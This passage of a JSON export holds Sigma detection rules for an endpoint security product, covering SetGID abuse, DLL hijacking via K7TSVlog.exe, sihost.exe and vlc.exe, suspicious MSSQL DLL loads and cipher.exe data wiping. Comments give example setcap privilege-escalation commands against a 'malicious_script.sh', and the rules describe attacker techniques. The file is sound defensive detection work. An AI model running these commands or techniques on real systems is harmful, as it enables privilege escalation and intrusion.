'\n selection_setcap:\n # setcap cap_setgid=pe /home/user/malicious_script.sh\n # setcap cap_setgid=e /home/user/malicious_script.sh\n # setcap cap_setgid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setgid=pe /home/user/malicious_script.sh\n # setcap cap_setgid,cap_setuid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setgid'\n\n selection_commandline:\n CommandLine|contains:\n - ' /home/'\n - ' /root/'\n - ' /opt/'\n - ' /bin/'\n - ' /sbin/'\n - ' /usr/bin/'\n - ' /usr/sbin/'\n - ' /tmp/'\n - ' /var/tmp/'\n - ' /run/'\n - ' /var/run/'\n - ' /dev/shm/'\n - ' /var/www/'\n\n selection_directory:\n CurrentDirectory|startswith:\n - '/home/'\n - '/root/'\n - '/opt/'\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/tmp/'\n - '/var/tmp/'\n - '/run/'\n - '/var/run/'\n - '/dev/shm/'\n - '/var/www/'\n\n filter_local_directory:\n CommandLine|contains: '/'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/usr/bin/rpm|'\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/containerd-shim-runc-v2|'\n\n exclusion_image:\n ParentImage:\n - '/usr/bin/find'\n - '/usr/bin/make'\n\n exclusion_dpkg:\n CommandLine|contains: 'chmod 2755 /usr/bin/ssh-agent'\n GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dnf:\n ParentCommandLine: '/bin/sh /var/tmp/rpm-tmp.*'\n GrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n\n exclusion_postfix:\n - CommandLine:\n - 'chmod 2755 /usr/sbin/postqueue'\n - 'chmod 2555 /usr/sbin/postqueue'\n - 'chmod 2755 /usr/sbin/postdrop'\n - 'chmod 2555 /usr/sbin/postdrop'\n ParentCommandLine|startswith:\n - '/bin/sh /usr/lib/postfix/sbin/postfix-script set-permissions'\n - '/bin/sh /usr/lib/postfix/sbin/post-install create-missing set-permissions '\n - '/bin/sh /usr/libexec/postfix/sbin/postfix-script set-permissions'\n - '/bin/sh /usr/libexec/postfix/post-install create-missing set-permissions '\n - GrandparentCommandLine|startswith:\n - '/bin/sh /usr/lib/postfix/sbin/postfix-script set-permissions'\n - '/usr/bin/sh /usr/libexec/postfix/postfix-script set-permissions'\n\n exclusion_journal:\n CommandLine: 'chmod g+s /run/log/journal/ /run/log/journal/???????????????????????????????? /var/log/journal/ /var/log/journal/????????????????????????????????'\n GrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dpkg_config:\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/*.postinst configure*'\n\n exclusion_postgresql:\n CommandLine: 'chmod 2775 /var/run/postgresql'\n ParentCommandLine: '/bin/sh /etc/init.d/postgresql start'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n\n exclusion_var_www:\n CommandLine|startswith: 'chmod 2755 /var/www/'\n\n exclusion_xivo:\n GrandparentCommandLine|contains: '/sbin/xivo-fix-paths-rights'\n\n exclusion_parallel:\n CommandLine: '/usr/bin/perl /usr/bin/parallel -j 4 chmod 555 {}'\n\n exclusion_asterisk:\n - ParentCommandLine|startswith: 'find /var/lib/asterisk'\n - GrandparentCommandLine: '/bin/sh /usr/share/asterisk/bin/asterisk_fix'\n\n exclusion_resto:\n ParentCommandLine|startswith: 'find resto_full_43 -exec chmod 
'\n\n exclusion_convert2rhel:\n GrandparentCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: (selection_chmod or selection_setcap) and (selection_commandline or (selection_directory and not filter_local_directory)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40584aef-d0d3-4764-9876-2e1f95ad821a",
"rule_name": "SetGID Access Flag Set via chmod/setcap",
"rule_description": "Detects chmod and setcap being used to set the SetGID bit or capability on a file.\nAttackers can set the SetGID bit on a file to execute it with a different (and potentially more privileged) group context.\nIt is recommended to investigate the file having its characteristics modified, as well as potential executions of this file to determine if this action was legitimate.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40aa4aee-13e6-4b99-b9bd-b4dd753c0115",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618918Z",
"creation_date": "2026-03-23T11:45:34.618920Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618925Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_k7tsvlog.yml",
"content": "title: DLL Hijacking via K7TSVlog.exe\nid: 40aa4aee-13e6-4b99-b9bd-b4dd753c0115\ndescription: |\n Detects potential Windows DLL Hijacking via K7TSVlog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7TSVlog.exe'\n ImageLoaded|endswith: '\\K7UI.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40aa4aee-13e6-4b99-b9bd-b4dd753c0115",
"rule_name": "DLL Hijacking via K7TSVlog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via K7TSVlog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40ac8087-2675-4c61-985e-773fbdac1328",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076446Z",
"creation_date": "2026-03-23T11:45:34.076448Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076453Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sihost.yml",
"content": "title: DLL Hijacking via sihost.exe\nid: 40ac8087-2675-4c61-985e-773fbdac1328\ndescription: |\n Detects potential Windows DLL Hijacking via sihost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\coremessaging.dll'\n - '\\desktopshellext.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40ac8087-2675-4c61-985e-773fbdac1328",
"rule_name": "DLL Hijacking via sihost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sihost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40c091bb-8190-4465-8e20-0f42a47d58b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084172Z",
"creation_date": "2026-03-23T11:45:34.084174Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084179Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.netspi.com/blog/technical/adversary-simulation/attacking-sql-server-clr-assemblies/",
"https://www.tarlogic.com/blog/lateral-movement-mssql-clr-socket-reuse/",
"https://asec.ahnlab.com/en/51343/",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1505/001/",
"https://learn.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server?view=sql-server-ver16"
],
"name": "t1190_mssql_suspicious_dll_loaded.yml",
"content": "title: Suspicious DLL Loaded by MSSQL\nid: 40c091bb-8190-4465-8e20-0f42a47d58b6\ndescription: |\n Detects the loading of a suspicious DLL by Microsoft SQL Server.\n Attackers able to execute arbitrary SQL commands in a Microsoft SQL Server are able to load CLR assemblies in the SQL server.\n One of the methods allowing attackers to load such assemblies imply that they write their malicious assemblies in a DLL on disk.\n This rule detects when a potentially malicious DLL is loaded by MSSQL.\n It is recommended to investigate the loaded DLL for malicious contents, and if necessary, quarantine it.\n It is also recommended to look for other malicious behavior on the host as well as potentially unauthorized authentications to the SQL server.\nreferences:\n - https://www.netspi.com/blog/technical/adversary-simulation/attacking-sql-server-clr-assemblies/\n - https://www.tarlogic.com/blog/lateral-movement-mssql-clr-socket-reuse/\n - https://asec.ahnlab.com/en/51343/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1505/001/\n - https://learn.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server?view=sql-server-ver16\ndate: 2023/09/04\nmodified: 2025/05/15\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n Image|endswith: '\\sqlservr.exe'\n ImageLoaded|contains: '\\'\n\n filter_signed:\n Signed: 'true'\n\n filter_system32:\n ImageLoaded|re:\n - '(?i):\\\\Windows\\\\System32\\\\[^\\\\]*.dll'\n - '(?i):\\\\Windows\\\\Syswow64\\\\[^\\\\]*.dll'\n\n filter_location:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - 
'?:\\Windows\\assembly\\'\n - '?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - '?:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\'\n\n filter_mssql:\n - ImageLoaded:\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\Shared\\instapi140.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\COM\\sqlvdi.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\Binn\\ssnmpn70.dll'\n - '*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\SqlAccess.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\hkengine.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\hkruntime.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\hkcompile.dll'\n - '?:\\Program Files*\\Microsoft SQL Server\\\\*\\MSSQL\\Binn\\DBGHELP.DLL'\n - ImageLoaded|startswith: '?:\\Program Files*\\Microsoft SQL Server\\\\*\\Binn\\'\n Product: 'Microsoft SQL Server'\n\n exclusion_oracle:\n ImageLoaded|endswith:\n - '\\product\\\\*\\client_?\\bin\\ora*.dll'\n - '\\product\\\\*\\client_?\\ora*.dll'\n - '\\product\\\\*\\client_?\\bin\\oci.dll'\n - '\\product\\\\*\\client_?\\oci.dll'\n - '\\product\\\\*\\client_?\\oraociei11.dll'\n Company: 'Oracle Corporation'\n\n exclusion_sqlvdi:\n # C:\\Program Files\\Microsoft SQL Server\\80\\COM\\sqlvdi.dll\n ImageLoaded|endswith: '\\sqlvdi.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'SQLVDI.DLL'\n\n exclusion_sqlevn:\n ImageLoaded|endswith: '\\MSSQL\\Binn\\Resources\\\\*\\sqlevn70.rll.mui'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'SQLEVN70.DLL.MUI'\n\n exclusion_commvault:\n ImageLoaded|endswith: '\\Commvault\\ContentStore\\Base\\CvDBNativeAPI.dll'\n Company: 'Commvault'\n OriginalFileName: 'CvDBNativeAPI.dll'\n\n exclusion_stored_procedure:\n ImageLoaded|endswith: '\\DATA\\xtp\\\\*\\xtp_?_*_*_*_*.dll'\n Description: 'XTP Native DLL'\n\n exclusion_openedge:\n ImageLoaded|endswith: '\\OpenEdge\\bin\\\\*.dll'\n Company: 'DataDirect Technologies'\n\n exclusion_gip-cps:\n ImageLoaded: '?:\\Program 
Files\\GIP-CPS\\CPSRev.dll'\n Description: 'GIP-CPS Revocation Provider DLL'\n\n exclusion_hpe:\n ImageLoaded: '?:\\Program Files\\HPE\\StoreOnce\\isvsupport\\sql\\bin\\XP_HPStoreOnceForMSSQL.dll'\n\n exclusion_zeromq:\n ImageLoaded|endswith: '\\bin\\x64\\libzmq.dll'\n Description: 'ZeroMQ lightweight messaging kernel'\n\n exclusion_dotnet:\n ImageLoaded: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\sort????????.dll'\n Company: 'Microsoft Corporation'\n\n exclusion_ibm:\n ImageLoaded: '?:\\Program Files (x86)\\IBM\\Client Access\\Mri????\\cwb*.dll'\n\n exclusion_secureworks:\n ImageLoaded: '?:\\ProgramData\\SecureWorks\\TaegisAgent\\\\*\\TaegisInj.x64.dll'\n Company: 'SecureWorks Corp.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40c091bb-8190-4465-8e20-0f42a47d58b6",
"rule_name": "Suspicious DLL Loaded by MSSQL",
"rule_description": "Detects the loading of a suspicious DLL by Microsoft SQL Server.\nAttackers able to execute arbitrary SQL commands in a Microsoft SQL Server are able to load CLR assemblies in the SQL server.\nOne of the methods allowing attackers to load such assemblies implies that they write their malicious assemblies to a DLL on disk.\nThis rule detects when a potentially malicious DLL is loaded by MSSQL.\nIt is recommended to investigate the loaded DLL for malicious content, and if necessary, quarantine it.\nIt is also recommended to look for other malicious behavior on the host as well as potentially unauthorized authentications to the SQL server.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-05-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40cf0043-cffd-4fc7-8fbf-6f5a0707feb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084636Z",
"creation_date": "2026-03-23T11:45:34.084638Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084643Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vlc.yml",
"content": "title: DLL Hijacking via vlc.exe\nid: 40cf0043-cffd-4fc7-8fbf-6f5a0707feb2\ndescription: |\n Detects potential Windows DLL Hijacking via vlc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vlc.exe'\n ProcessSignature: 'VideoLAN'\n ImageLoaded|endswith:\n - '\\libvlc.dll'\n - '\\axvlc.dll'\n\n filter_legitimate_image:\n Image:\n - '?:\\Program Files\\VideoLAN\\VLC\\\\*'\n - '?:\\Program Files (x86)\\VideoLAN\\VLC\\\\*'\n - '*\\VLCPortable\\App\\vlc\\\\*'\n\n filter_legitimate_imageloaded:\n ImageLoaded:\n - '?:\\Program Files\\VideoLAN\\VLC\\\\*'\n - '?:\\Program Files (x86)\\VideoLAN\\VLC\\\\*'\n - '*\\VLCPortable\\App\\vlc\\\\*'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'VideoLAN'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40cf0043-cffd-4fc7-8fbf-6f5a0707feb2",
"rule_name": "DLL Hijacking via vlc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vlc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40e1474c-b643-46fe-8410-1397a2af4f88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088188Z",
"creation_date": "2026-03-23T11:45:34.088190Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088195Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/",
"https://learn.microsoft.com/en-us/troubleshoot/windows-server/certificates-and-public-key-infrastructure-pki/use-cipher-to-overwrite-deleted-data",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_data_wiper_cipher.yml",
"content": "title: Data Erased via cipher.exe\nid: 40e1474c-b643-46fe-8410-1397a2af4f88\ndescription: |\n Detects data erased using cipher.exe.\n Cipher.exe is a built-in Windows binary primary used to encrypt/decrypt data from NTFS drive that can also be used to overwrite deleted data of a disk.\n Adversaries may permanently delete files and artifacts left behind by the actions of their intrusion activity.\n It is recommended to check if the process removing data has legitimate reason to to so.\nreferences:\n - https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/certificates-and-public-key-infrastructure-pki/use-cipher-to-overwrite-deleted-data\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2024/11/26\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - ProcessImage|endswith: '\\cipher.exe'\n - OriginalFileName: 'CIPHER.EXE'\n\n exclusion_mindray:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Mindray\\eGateway\\CPAU.exe'\n - '?:\\Program Files\\Mindray\\eGateway\\CPAU.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40e1474c-b643-46fe-8410-1397a2af4f88",
